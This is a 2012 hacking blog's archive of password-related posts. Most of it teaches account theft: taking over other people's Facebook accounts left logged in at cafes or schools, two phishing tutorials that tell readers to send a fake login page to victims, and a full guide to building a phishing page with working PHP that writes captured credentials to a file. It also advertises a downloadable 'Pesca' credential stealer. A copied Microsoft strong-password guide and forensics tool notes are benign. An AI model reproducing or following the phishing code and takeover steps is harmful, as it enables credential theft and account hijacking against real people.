Pages

Showing posts with label Password. Show all posts
Showing posts with label Password. Show all posts

Sunday, July 29, 2012

How To Change Facebook Password Without Knowing The Current Password

Hello guys today i am gonna tell you the way how to change the password of your Facebook account without knowing the current password . this is actually a Facebook password recovery tool which fails ;) .






Hint : if you find any account login in any cafe or in school you can change his/her Facebook password without knowing his/her current password . I guess you understand what i mean ?






NOTE : This is Only For Educational Purpose , Don't Use This Information To Harm Innocent People

Steps :


You will redirect to a page . now click on continue .
  • Then click continue again .
You will get option to change your password without knowing your current password . 
For any queries let me know in comments :)
 
Join on Facebook

https://www.facebook.com/groups/hackinghelp

Like us

https://www.facebook.com/sundaravelit
 
 

Wednesday, April 18, 2012

Hack Facebook Password : Sundaravel


This advanced program will help you to hack facebook password of any account. All you need to know is their email address and you’ll be able to gain access to the users account. This program is to be used to recover and change your own facebook accounts password, to help a friend recover theirs with their permission, or for parents to keep an eye on their children’s accounts. If you use the hack facebook password  program for any purposes besides this, you are responsible for your own actions.

With that being said, the program hack facebook password is fairly simple to use. In the first text box you will insert the email address for the account or if you’re unable to figure that out, you can input the profile id which is usually like a 9 digit number sequence but can often be word or words set by the profile owner. You can find this number by looking at the URL when you visit the program.

After you’ve got the first text box filled, set the password in the next two boxes. I’m well aware that you could simply use the program again in order to change the password if you didn’t input it correctly; however, to make it a more practical program you’ll need to verify that you typed it correctly. Finally, hit the "change" button. This will begin the process of logging you in and changing the password. When it has completed the task, you will be notified with a message box informing you it has completed and that you can now log in.

Use the Hack Facebook Password program responsibly. You are responsible for your own actions. Don’t go around causing too much trouble at your school, work, or household.

Download it here!

Thursday, March 29, 2012

Learn How to Hack Facebook Password

Hacking Facebook Account Password: Facebook Phishing for Hacking Facebook
 Facebook has evolved into one of the hottest social networking website in the world. Here is a simple tutorial that you can use to hack your friend's facebook password. Here i'm writting on hacking Facebbok password using Facebook Phisher.
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public.[Read more about phishing on Wikipedia]


Facebook Phisher

Please Note: Phishing is legally offensive. I am not responsible for any action done by you.


Hacking Facebook password:

Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. I recommend the use of Phishing to hack facebook account since it is the easiest one.

1. First of all download Facebook Phisher

2. The downloaded file contains:
  • Index.html
  • write.php
3. Upload both files to any of the free webhost sites

4. Now, send this phisher link (index.html link) to your victim and make him login to his Facebook account using your sent Phisher.

5. Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in "passes.txt". This file is created in your webhost control panel as shown.


If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Facebook password and can easily use it for hacking Facebook account.

6. Now, open passes.txt to get hacked Facebook id and password as shown.


Hope this tutorial was useful for you.



Don't Forget to Leave a Comment :)

Thursday, March 22, 2012

how to create strong and secure passwords

At present we need a password or PIN for every almost every online activity and strong password is very important, as every users wants to protect their personal files, information & other data and avoid hackers from getting into their accounts.
However, not everyone can come up with a nice strong password, which is why we have compiled a list of two online tools that help users to create strong and unpredictable passwords
 
"Make Password" is a Web application that help users to generate strong password, for Social networks, email ID etc
1.png (1366×730)

The PIN or Codes generated by "Make Passwords" is generated on Random basis and are not stored anywhere.
You  can select the “Password Strength” option, which displays the strength of the password generated, in a range of 0 – 100 (with above 75 are Strong).
Once the user can picked out all the options, just click “Make Password(s)” and the passwords will be displayed in "Plain text" "Web page" or in "CSV" file.
 
 "PassWord Bird" is an Best and Recommended Webapp for Creating secure password related with your name, your Special thing, Special Date etc :)
2.png (320×143)

Just as you provide special words, names, dates etc it will instantly create an Secure Combination for you. You can select "make new one: to generate new unique password on random basis.One thing to note is that the website don't use any special symbols (! @ # $ % & * ), But it uses upper and lower case and Numbers in generating 'Secure Password'So now onwards if you want to change your password, or want to keep your data secure. Use these Webapps to create some of the most 'Secure Combinations' :)) Cheers ~~There are plenty of service like Free Password Generator. You can even use them but recommended is to use from given above.

Wednesday, March 7, 2012

Pesca 0.75 local stealer Ftp+Mail+Php Uploader + Php logger





Steals:

* MSN Messenger
* Windows Messenger
* Windows Live Messenger
* Yahoo Messenger (5.x and 6.x)
* Google Talk
* ICQ Lite 4.x/5.x/2003
* AOL Instant Messenger (v4.6,6.x,Pro)
* Trillian
* Miranda
* GAIM/Pidgin
* MySpace IM
* PaltalkScene
* Outlook Express
* Microsoft Outlook 2000
* Microsoft Outlook 2002/2003/2007
* Windows Mail
* IncrediMail
* Eudora
* Netscape 6.x/7.x
* Mozilla Thunderbird
* Group Mail Free
* Yahoo! Mail
* Hotmail/MSN mail
* Gmail
*Internet Explorer 5.*
*Internet Explorer 6.*
*Firefox 1.*
*Firefox 2.*
*Firefox 3.*
*Dialup Passwords
*RAS Passwords
*VPN Passwords
*Outlook passwords
*AutoComplete passwords in Internet Explorer
*Password-protected sites in Internet Explorer
*MSN Explorer Passwords
* Login passwords of remote Computers
* Outlook 2003 Passwords of mail accounts on exchange server
* Password of MSN Messenger / Windows Messenger accounts
* Internet Explorer 7 Passwords of password-protected Web sites
*Steam Usernames
*Steam Password
*Icq 6 Username
*Icq 6 Hash
*Chrome Password *BETA*
*Wireless Keys
.................................................................................

Disclaimer : Use it at you own Risk !
.................................................................................
..................................................................................

How to Make A Phishing Website : Full Tutorial -Sundaravel


Tired Of Searching For Those Phishing Files 
How About Making Your Own Latest Fake Page Of Any Site In Just Few Steps, I'm Giving Tutorial of Orkut and you can make phisher of every sites with this Tutorial
Here Is The Tutorial http://www.chaaps.com/wp-content/uploads/2009/11/phishinggg.jpg
1. First Things First You Must Choose The Site Which You Wanna Make A Phisher From.

2. When You Found Your Site Right Click On It And Say "view source" And Save It On Desktop As index.html

3. Open The "index.html" With Notepad And Press CTRL+F And Type action. You Should Find A Command Looking Like This
form action="RANDOM URL" method="post"



4.Change The Link After the Word action To write.php And Change The Word Post To get, Which Is Close To The Word method

Remember Dont Erase The Inverted Commas And Commas It Might Affect The Page

5. Save index.html

see the img given below

After saving it.

6. Open a new file in Notepad

<*?php
header("Location: RANDOM URL");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Remove The * Symbol From The Start Of The Code

In The place of RANDOM URL write the URL wich u hav deleted in 3. Step

Now copy the above code and paste it on notepad

save as.

write.php

7. Now open new file in Notepad and leave it blank and save as passwords.txt

8. Now upload 3 files(index.html, write.php & passwords.txt) on any free hosting site like 110mb.*com or justfree.*com

remove *
9. Test Out Your Website. Type In Something In Your Phisher And Then Go To Filemanager And Open The Password File, What You Wrote Should Be Typed Here!,

ENJOY!!!! ANd Don't Forget To Leave A Comment :)

Learn How to Hack Facebook Password

Hacking Facebook Account Password: Facebook Phishing for Hacking Facebook

Facebook has evolved into one of the hottest social networking website in the world. Here is a simple tutorial that you can use to hack your friend's facebook password. Here i'm writting on hacking Facebbok password using Facebook Phisher.
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. [Read more about phishing on Wikipedia]




Facebook Phisher

Please Note: Phishing is legally offensive. I am not responsible for any action done by you.


Hacking Facebook password:

Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. I recommend the use of Phishing to hack facebook account since it is the easiest one.

1. First of all download Facebook Phisher

2. The downloaded file contains:
  • Index.html
  • write.php
3. Upload both files to any of these free webhost sites:
See Best Free Webhosting websites

4. Now, send this phisher link (index.html link) to your victim and make him login to his Facebook account using your sent Phisher.

5. Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in "passes.txt". This file is created in your webhost control panel as shown.


If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Facebook password and can easily use it for hacking Facebook account.

6. Now, open passes.txt to get hacked Facebook id and password as shown.


Hope this tutorial was useful for you.



Don't Forget to Leave a Comment :)

Secure Password - Microsoft

Introduction

Although many alternatives for user authentication are available today, most users log on to their computer and remote computers using a combination of their user name and a password typed at their keyboard. There are products that use more secure technologies such as biometrics, smart cards, and one-time passwords available for all popular operating systems; but the reality is that many organizations still rely on passwords and they will continue to do so for years to come. Users often have many different computer accounts at work, for their cell phone, at their bank, with insurance companies, and so on. To make it easier to remember their passwords, users often use the same or similar passwords on each system; and given a choice, most users will select a very simple and easy-to-remember password such as their birthday, their mother's maiden name, or the name of a relative. Short and simple passwords are relatively easy for attackers to determine. Some common methods that attackers use for discovering a victim's password include:
  • Guessing-The attacker attempts to log on using the user's account by repeatedly guessing likely words and phrases such as their children's names, their city of birth, and local sports teams.
  • Online Dictionary Attack-The attacker uses an automated program that includes a text file of words. The program repeatedly attempts to log on to the target system using a different word from the text file on each try.
  • Offline Dictionary Attack-Similar to the online dictionary attack, the attacker gets a copy of the file where the hashed or encrypted copy of user accounts and passwords are stored and uses an automated program to determine what the password is for each account. This type of attack can be completed very quickly once the attacker has managed to get a copy of the password file.
  • Offline Brute Force Attack-This is a variation of the dictionary attacks, but it is designed to determine passwords that may not be included in the text file used in those attacks. Although a brute force attack can be attempted online, due to network bandwidth and latency they are usually undertaken offline using a copy of the target system's password file. In a brute force attack the attacker uses an automated program that generates hashes or encrypted values for all possible passwords and compares them to the values in the password file.
Each of these attack methods can be slowed down significantly or even defeated through the use of strong passwords. Therefore, whenever possible, computer users should use strong passwords for all of their computer accounts. Computers running versions of Windows based on Microsoft Windows NT, including Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003, support strong passwords. In Windows, a strong password is a password that includes characters from at least three of the five groups in the following Character Classes table.
Character Classes
Group
Example
Lowercase letters
a, b, c, ...
Uppercase letters
A, B, C, ...
Numerals
0, 1, 2, 3, 4, 5, 6, 7, 8, 9
Non-alphanumeric (symbols)
( ) ` ~ ! @ # $ % ^ & * - + = | \ { } [ ] : ; " ' < > , . ? /
Unicode characters
€, Γ, ƒ, and λ
Note: Space characters do not fall under any of these five groups and do not count towards the password complexity requirements.
The passwords of particularly sensitive accounts such as those used by administrators or senior executives or for running critical network services should be composed from four or even all five of these groups. On the other hand, passwords that must be used by human beings must be easily remembered; the loss of an executive or critical administrator account password could be devastating. This document describes how passwords are stored in the Windows family of operating systems and gives guidance to Administrators on how to maximize the security of their passwords.
These contradictory requirements can be overcome by thinking about pass phrases rather than passwords. Every version of Windows that supports strong passwords supports the use of spaces and punctuation symbols in account passwords. For example, "I re@lly want to buy 11 Dogs!" is a valid pass phrase. With more than twenty characters it is a very long pass phrase, and it includes characters from 4 of the 5 possible groups. It is also easy to remember! Most password cracking tools assume the password will never exceed 14 characters, which is the limit that DOS network boot disks, Microsoft Remote Installation Services (RIS) Pre eXecutable Environment (PXE) boot disks, and older LAN Manager clients (Win9x) must utilize. Even without complexity, a very long password (>14 characters, up to 128 characters) can be the best possible protection against having an especially sensitive password broken.
Note: Do not use the example passwords within this document. Although the password discussed above, "I re@lly want to buy 11 Dogs!", is very long and complex, attackers may add it and other sample passwords in this document to their attack tools.
If administrators have legacy systems, RIS, or similar requirements to adhere to, or if they simply dislike dealing with an especially lengthy password, using a shorter password with complex characters offers good protection. However, keep in mind the longer the password the more difficult it is to break. And adding both complexity and length makes it the most difficult of all to break. Establishing password policies for your organization will help to protect your users from attackers who try to impersonate them, thereby protecting your organization from the loss, exposure, or corruption of sensitive information.
This document explains how passwords are stored in the Windows family of operating systems, gives guidance to administrators on how to maximize the security of their passwords, and explains to users how to create new passwords that meet the complexity requirements and are still easy to remember.
The document includes information and guidance on the following topics:
  • Additional details about password cracking.
  • How Windows stores passwords including information about LAN Manager (LM) hashes and NTLM hashes.
  • Description of Unicode characters and using Unicode characters by entering ALT key combinations.
  • Requirements for legacy systems such as Windows 98.
  • Establishing a password policy for your organization.
  • Communicating password complexity to end users, which includes text that is ready for you to customize and forward to the people who work in your organization.
  • Resources for additional information including links to Web sites with related information that may help you to establish strong password policies in your organization.

Before You Begin

Before proceeding with the discussion of password policy creation it is important that you have a solid understanding of how password hashes are created and stored by the Windows operating system family. It will also be helpful for you to fully understand other concepts related to password complexity such as entropy, Unicode characters, and ALT characters.

Password Storage in Windows

By default, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 never store user passwords in plaintext. Instead, passwords are stored using two different password representations, commonly called "hashes." The first, the LAN Manager (LM) hash, is much less secure than the second, the NTLM hash. The reason for storing both representations is for backward compatibility with older applications and operating systems such as Windows 98.
The LAN Manager (LM) Hash
The LM hash is technically speaking not a hash at all. It is computed as follows:
  1. Convert all lowercase characters in the password to uppercase
  2. Pad the password with NULL characters until it is exactly 14 characters long
  3. Split the password into two 7 character chunks
  4. Use each chunk separately as a DES key to encrypt a specific string
  5. Concatenate the two cipher texts into a 128-bit string and store the result
As a result of the algorithm used to generate the LM hash, the hash is very easy to break. First, even a password longer than 8 characters can be attacked in two discrete chunks. Second, the entire lowercase character set can be ignored. This means that most password cracking tools will start by cracking the LM hashes and then simply vary the alpha characters in the cracked password to generate the case-sensitive passwords. Note that in order to log on to a computer running Windows 2000, whether remotely or locally, you will need to use the case-preserved password.
The NTLM Hash
The NTLM hash is also known as the Unicode hash because it supports the full Unicode character set. The NTLM hash is calculated by taking the plain text password and generating a Message Digest 4 (MD4) hash of it. The MD4 hash is what is actually stored in either the Active Directory database or the local Security Accounts Manager (SAM) database. The NTLM hash is much more resistant to brute force attacks than the LM hash. Brute forcing an NTLM hash takes several orders of magnitude longer than brute forcing the NTLM hash of the same password.
Entropy
Entropy is a measure of disorder in a system. The level of entropy in a password is determined by how random it is in terms of the range and order of characters in it. When selecting a password that is resistant to cracking, it is important that you carefully pick your entropy and where it appears in the password. Most brute force password cracking tools start out by search for alphanumeric characters and symbols present on most keyboards such as ` ~ ! @ # $ % ^ & * ( ) _ - + = (sometimes called the "upper row symbols" because they appear on the top row of most U.S. keyboards). With that knowledge you can make a password more resistant to cracking by using different symbols such as these: [ ] { } < >. You increase their resistance to cracking even further by using ALT key combinations. Note that due to the way LM hashes are created, putting a symbol as the only entropy in the eighth position of an eight character password only has a small impact on password complexity. For maximum entropy and complexity, non-alphanumeric characters need to be present throughout the password.

Using Unicode Characters in ALT Key Combinations

Most users should have no problem finding pass phrases that they can easily remember, but for particularly sensitive accounts such as those with domain administrator privileges it is highly recommended that Unicode characters are included in the passwords using ALT key combinations. These are characters that do not appear on standard U.S. keyboards. You enter them by holding down the ALT key (or the FN and the ALT key on most laptop computers) and typing a three- or four-digit number on the numeric keypad (the numeric overlay keypad on a laptop computer).
The use of these types of characters greatly strengthens passwords in two ways: First, password cracking tools are often unable to test the vast majority of these types of characters. Second, the use of these characters greatly increases the range of characters that may appear in your password, which strengthens the potential complexity of the password by many orders of magnitude. When using ALT key combinations it is very important that you remember the leading zero, if present, because leaving the zero off results in a different character. For example, ALT+128 is Ç, while ALT+0128 is €. The rest of this section focuses on four digit codes, which access the entire Unicode character set, and ignore the three digit codes, which only access the extended ASCII character set.
The following table lists the numerical values that can be used as ALT key combinations. Recommended values are between 0128 and 1024. Each cell in the table below shows either a single value or a range of values. For example, the first cell shows "0128-0159." This means that you could use any value between 0128 and 0159, such as ALT+0135, which corresponds to the Unicode character "‡".
Recommended ALT Code to Use for ALT Key Combinations
0128-0159
0306-0307
0312
0319-0320
0329-0331
0383
0385-0406
0408-0409
0411-0414
0418-0424
0426
0428-0429
0433-0437
0439-0447
0449-0450
0452-0460
0477
0480-0483
0494-0495
0497-0608
0610-0631
0633-0696
0699
0701-0707
0709
0711
0716
0718-0729
0731
0733-0767
0773-0775
0777
0779-0781
0783-0806
0808-0816
0819-0893
0895-0912
0914
0918-0919
0921-0927
0929-0930
0933
0935-0936
0938-0944
0947
0950-0955
0957-0959
0961-0962
0965
0967-1024


Not all Unicode characters increase password complexity because they are automatically converted to ASCII characters, resulting in a weakened password instead. The following table shows character codes that should not be used in a password and the ASCII character to which they are converted.
ALT Code Not to Use for ALT Key Combinations
ALT Code
Unicode Character
Resulting Character
0175
¯
_
0190
¾
_
0222
Þ
_
0254
þ
_
0101
e
E
0200
È
E
0202
Ê
E
0203
Ë
E
0232
è
E
0234
ê
E
0235
ë
E
0100
d
D
0208
Ð
D
0240
ð
D
0117
u
U
0217
Ù
U
0218
Ú
U
0219
Û
U
0249
ù
U
0250
ú
U
0251
û
U
0192
À
A
0193
Á
A
0194
Â
A
0195
Ã
A
0224
à
A
0225
á
A
0226
â
A
0227
ã
A
0065
A
A
0114
r
R
0174
®
R
0121
y
Y
0221
Ý
Y
0253
ý
Y
0255
ÿ
Y
0120
x
X
0215
×
X
0111
o
O
0210
Ò
O
0211
Ó
O
0212
Ô
O
0213
Õ
O
0216
Ø
O
0242
ò
O
0243
ó
O
0244
ô
O
0245
õ
O
0248
ø
O
0105
i
I
0204
Ì
I
0205
Í
I
0206
Î
I
0207
Ï
I
0236
ì
I
0237
í
I
0238
î
I
0239
ï
I
0169
©
C
0099
c
C

Password Age and Reuse

Users should also change their passwords frequently. Even though long and strong passwords are much more difficult to break than short and simple ones, they can still be cracked. An attacker who has enough time and computing power at his disposal can eventually break any password. In general, passwords should be changed within 42 days, and old passwords should never be reused.

Developing a Password Policy for Your Organization

This section provides the following step-by-step instructions for enhancing security by creating and communicating a password policy for your organization.
  • Identifying what computer operating systems are present on your organization's network
  • Understanding what the limitations are for those operating systems
  • Defining what the technical requirements for passwords will be on your organization's network.
  • Determining how much formality is appropriate regarding the documentation and communication of the password policy for your organization
  • Documenting the password policy in writing
  • Communicating the password policy to the users before implementing it on your systems
  • Implementing the password policy on your organization's computer systems
  • Reminding users on an ongoing basis about importance of observing the password policy and other corporate security policies

Identifying Existing Operating Systems

In order to specify password policies that will not cause problems for any users logging on to computers in your organization you need to know what operating systems they are using. It is possible that you already know exactly what operating systems are in use on your network. If you don't then you need to find out. You do not need to know how many of each, you do not need to create a precise inventory of all the systems on your network at this time. To be able to design a suitable password policy you only need to know if there are any legacy systems present. Computers running Windows 95, Windows 98, or Windows Millennium Edition are the legacy operating systems that you are most likely to encounter on your network.
  • To identify what computer operating systems are in use on your organization's network
    You can ask your users to check which version they are running for you, or you can walk up to each computer and check yourself. Regardless of who does the checking, this is the process:
    1. Click Start, and then click Run.
    2. In Open, type winver.exe, and then click OK. The version number is displayed in the About Windows dialog box.

Understanding the Limitations of Some Operating Systems

As explained earlier, computers running Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 all support long and strong passwords. Computers running Windows 95, Windows 98, and Windows Millennium Edition do not. If any of the computers on your network are running any of these versions of Windows, then your password policy will have to accommodate these computers.
For organization that include computers running Windows 95, Windows 98, or Windows Millennium Edition, then the user passwords cannot be longer than 14 characters and cannot include characters generated through ALT key combinations.
If all computers in your organization are running Windows NT 4.0, Windows 2000, Windows XP, or Windows Server 2003, then user passwords can be up to 128 characters long and those passwords can include characters generated through ALT key combinations.

Defining Technical Requirements for Passwords

For computers running Windows 2000, Windows XP, and Windows Server 2003, you can enforce up to five settings related to password characteristics.
In this step, we provide you with the setting definitions and our recommendation for these settings. You will decide what values your organization will enforce.
Technical Requirements for Passwords
Setting
Description
Recommendation
Enforce password history
Determines the number of unique new passwords a user must use before an old password can be reused. It can be set between 0 and 24; if set to 0, then enforce password history is disabled.
For most organizations, set to 24 passwords remembered.
Maximum password age
Determines how many days a password can be used before the user is required to change it. It can be set between 0 and 999; if set to 0, then passwords never expire. Setting this too low may cause a great deal of frustration for your users, setting it too high or disabling it will give potential attackers more time to try to break users' passwords.
For most organizations, set to 42 days.
Minimum password age
Determines how many days a user must keep their new password before they can change it. This setting is designed to work with the Enforce password history setting so that users cannot quickly reset their password 24 times and then change their password back to the old password. It can be set between 0 and 999; if set to 0, then users will be able to immediately change their password right after changing it.
For most organizations, set to 2 days.
Minimum password length
Determines how short passwords can be. Although computers running Windows 2000, Windows XP, and Windows Server 2003 support passwords up to 128 characters, this setting can only be set between 0 and 14 characters. If it is set to 0, then users are allowed to have blank passwords; this value should never be used.
Set to 8 characters.
Passwords must meet complexity requirements
Determines whether or not password complexity is enforced.
When this setting is enabled user passwords will have the following requirements:

  • The password is at least six characters long.
  • The password contains characters from three of the following five categories: English uppercase characters (A - Z); English lowercase characters (a - z); base 10 digits (0 - 9); non - alphanumeric (For example: !, $, #, or %); Unicode characters.
  • The password does not contain three or more characters from the user's account name. If the account name is less than three characters long then this check is not performed because the rate at which passwords would be rejected would be too high. When checking against the user's full name several characters are treated as delimiters that separate the name into individual tokens: commas, periods, dashes/hyphens, underscores, spaces, pound-signs and tabs. For each token that is three or more characters long, that token is searched for in the password, and if it is present, the password change is rejected. For example, the name "Erin M. Hagens" would be split into three tokens: "Erin," "M," and "Hagens." Since the second token is only one character long it would be ignored. Therefore, this user could not have a password that included either "erin" or "hagens" as a substring anywhere in the password. All of these checks are case insensitive.
Enable this setting.

Documenting Your Organization's Password Policy

Next, you need to decide how formal you want to be when documenting your organization's password policy.
At a minimum, write down the settings that will be enforced on the computers in your organization's network.
Some organizations may want to record the policy in a formal policy statement. If you feel that this level of formality is suitable for your organization, you may want to take a look at the links to sample policies that appear in "Related Information" later in this document.
Some organizations may have regulatory requirements for documenting these sorts of corporate policies. If you believe that your organization has regulatory requirements, you ought to have the policy reviewed by your organization's legal counsel before implementing it and communicating it to your users.

Communicating the Password Policy to Users

Any important policy change needs to be clearly communicated to the people who work at your organization. When changing or implementing password policies, it is extremely important that you clearly explain to the people impacted what you are doing and why.
Sample Password Policy for Your Use
The following text is designed for you to copy and distribute to the people you work with. Although it is ready for use as is, you may want to change specific terms to better match your own needs and specific password policy requirements.
You will notice that this sample text does not discuss or recommend the use of ALT key combinations; this is because their use may be too demanding for many users. ALT key combination use is recommended for technically savvy users who have powerful or sensitive accounts, such as administrators.
To organization members:
Weak and blank passwords are one of the easiest ways for attackers to break into your computer and our organization's network. Passwords that are used for years at a time, or passwords that are reused frequently, are also much more likely to be discovered by an attacker.
To increase the protection of your account on the network, you are required to use strong passwords when accessing corporate computer systems. You will be required to change your password periodically, and you will be required to use passwords that do not match your previous passwords.
A strong password is a password that is at least eight characters long and uses characters from three of the five following groups:
  1. Lowercase letters
  2. Uppercase letters
  3. Numbers (for instance, 1, 2, 3)
  4. Symbols (for instance, @, =, -, and so on)
  5. Unicode characters
Your passwords will also not be able to contain three or more consecutive letters from your user account name. You will be required to change your password every 42 days, and you will not be able to reuse passwords.
When you change your password, your new password will automatically be checked for complexity and it will be compared to your previous passwords. This may sound like a frustrating situation and you may be tempted to write down your password and paste it to your desk, computer monitor, or some other easily accessed location. However, the moment you do that you are exposing your computer and our entire organization to tremendous risk as anyone could walk up to your computer and log on to the network using your credentials. Therefore, never write down your passwords. Instead, create passwords that are easy to remember.
Below you'll find some more background information about password security as well as specific advice on how to create strong passwords that are easy to remember.
Using Pass Phrases
Perhaps it might be easier to think in terms "pass phrases" rather than "passwords." If your computer is running Windows NT 4.0 or earlier, Windows 2000, Windows XP, and Windows Server 2003, passwords up to fifteen or more characters are supported, including spaces. Therefore, "You can try to break this until the cows come home!" is a perfectly valid pass phrase that will be extremely difficult for an attacker to break even using the best password cracking tool around. If your computer is running one of the operating systems mentioned above, try to use a very long pass phrase that includes a mix of uppercase letters, lowercase letters, numbers, and symbols.
Note that you should not actually use the example passwords within this document, although the password discussed above, "You can try to break this until the cows come home " is very long attackers may add it and other sample passwords in this document to their attack tools. These are examples, you should always create your own unique passwords.
More Password Tips
The following information provides tips and do's and don'ts for creating and remembering passwords and password phrases.
  1. Use more than one word
    Instead of only using the name of someone you know, such as "Allison", choose something about that person no one else knows about, for instance, "AllisonsBear" or "AlliesBear".
  2. Use symbols instead of characters
    Many people tend to put the required symbols and numbers at the end of a word they know, for instance, "Allison1234". Unfortunately, this is relatively easy to break. The word "Allison" is in a lot of dictionaries that include common names; once the name is discovered, the attacker has only four more relatively easy characters to guess. Instead, replace one or more of the letters within the word with symbols that you'll easily recall. Many people have their own creative interpretations of what letter some symbols and numbers resemble. For example, try substituting "@" for "A", "!" for "l", a zero (0) for an "O", a "$" for an "S", and a "3" for an "E". With substitutions such as these, "@llis0nbe@r", "A!!isonB3ar", and "A//i$onBear" are all recognizable to you, but they would be extremely difficult to guess or break. Look at the symbols on your keyboard and think of the first character that comes to mind-it might not be what someone else would think of, but you will remember it. Use some of those symbols as substitutions for your passwords from now on.
  3. Choose events or people that are on your mind
    To remember a strong password that will have to change in several months, try selecting an upcoming personal or public event. Use this as an opportunity to remind yourself about something pleasant that is going on in your life, or a person whom you admire or love. You won't be likely to forget the password if it is funny or endearing. Make it unique to you. Be sure to make it a phrase of two or more words, and continue to slip in your symbols. For example: "J0hn$Gr@du@tion".
  4. Use phonetics in the words
    In general, password dictionaries used by attackers search for words embedded inside your password. As mentioned before, don't hesitate to use the words, but make sure you liberally sprinkle those words with embedded symbols. Another way to trump the attacker is to avoid spelling the words properly, or use funny phonetics that you can remember. For instance, "Run for the hills" could become "R0n4dHiLLs!" or "R0n 4 d Hills!" If your manager's name happens to be Ron, you might even get a chuckle each morning typing this in. If you are a lousy speller, you are ahead of the game already.
  5. Don't be afraid to make the password long
    If you remember it better as a full phrase, go ahead and type it in. Longer passwords are much harder to break. And even though it is long, if it is easy for you to remember, you will probably have a lot less trouble getting into your system, even if you aren't the best typist in the world.
  6. Use first letters of a phrase
    To create an easy-to-remember and strong password, begin with a properly capitalized and punctuated sentence that is easy for you to remember. For example: "My daughter Kay goes to the International School." Next, take the first letter of each word in your sentence, preserving the capitalization used in the sentence. In the example above "MdKgttIS" would be the result. Finally substitute some non-alphanumeric characters for some of the letters in the password. You might use an "@" to replace an "a" or use an "!" to replace an "L". After one such substitution the example password above would be "MdKgtt!S"-a very difficult password to break, yet a password that is easy for you to remember, as long as you can recall the sentence on which the password is based.
Do's:
  • Combine letters, symbols, and numbers that are easy for you to remember and hard for someone else to guess.
  • Create pronounceable passwords (even if they are not words) that are easier to remember, reducing the temptation to write down your password.
  • Try out using the initial letters of a phrase you love, especially if a number or special character is included.
  • Take two familiar things, and then wrap them around a number or special character. Alternatively, change the spelling to include a special character. In this manner, you get one unfamiliar thing (which makes a good password because it is easy for you and you alone to remember, but hard for anyone else to discover). Here are a few examples:
"Phone + 4 + you" = "Phone4you" or "Fone4y0u"
"cat + * + Mouse" = "cat*Mouse" or "cat*Mou$e"
"attack + 3 + book" = "attack3booK" or "@tack3booK"
Don'ts:
  • Don't use personal information such as derivatives of your user ID, names of family members, maiden names, cars, license tags, telephone numbers, pets, birthdays, social security numbers, addresses, or hobbies.
  • Don't use any word in any language spelled forward or backward.
  • Don't tie passwords to the month, for example, don't use "Mayday" in May.
  • Don't create new passwords that are substantially similar to ones you've previously used.

Implementing the Password Policy in Your Organization

Now that you have specified, documented, and communicated the new password policy, it is time to implement the password policies on your network. For information about enforcing password usage, see "Enforcing Strong Password Usage Throughout Your Organization" in the Security Guidance Kit.

Tuesday, March 6, 2012

RAM Forensics Tools -Backtrack

pdfbook.py

pdfbook.py is a utility that gathers information relating to Facebook from a process dump. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > fbookstrings”. Finally, we use pdfbook.py on the fbookstrings file resulting from the strings command.
Example Usage:pdfbook.py -f fbookstrings

pdgmail

pdgmail.py is a utility similar to pdfbook.py, but instead of gathering Facebook information from process dumps, it gathers Gmail information. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > gmailstrings”. Finally, we use pdgmail.py on the gmailstrings file resulting from the strings command.

Example Usage:pdgmail.py -f gmailstrings

PTK

PTK is a forensics toolkit, similar to the Sleuthkit toolkit. It contains built in modules in order to analyze nearly any type of media or filetype that may be encountered in a forensics investigation. It is browser based, and first needs to have a MySQL database configured. Leave all fields as default, and use the password “toor” for the root user in MySQL. It should setup successfully, at which point you need to register for the free version. Copy the license file you received into the config directory for PTK located at /var/www/ptk/config.
PTK on Backtrack 5 tutorial and walkthrough
Next, log in as either admin or investigator, and open a new case. Fill out the necessary information, then add an image file to begin. It can even be a RAM dump. From here, the built in tools will help you pull information from the image(s).

Volatility

Volatility is a framework writen in Python that specializes in RAM analysis. The Volatility Framework can analyze volatile memory dumps from any system type, and can provide a deep insight into the state of the system while it was running. The Volatility Framework has been tested on Windows, OS X, Linux, and even Cygwin. In the example below, we use Volatility in order to list processes that were running on the system while the RAM image ram.img was taken.

Example Usage:volatility plist -f ram.img

PDF Forensic Tools -Backtrack

pdfid

pdfid is a utility that can extract useful information from a PDF file. Specifically, pdfid extracts header information from the PDF such as obj, endobj, stream and other information. Some PDF exploits alter this information, so pdfid can sometimes show the user what exactly is going on inside of the PDF. In this example, we simply gather information from a PDF file called file.pdf.
Example Usage: pdfid.py file.pdf

pdf-parser

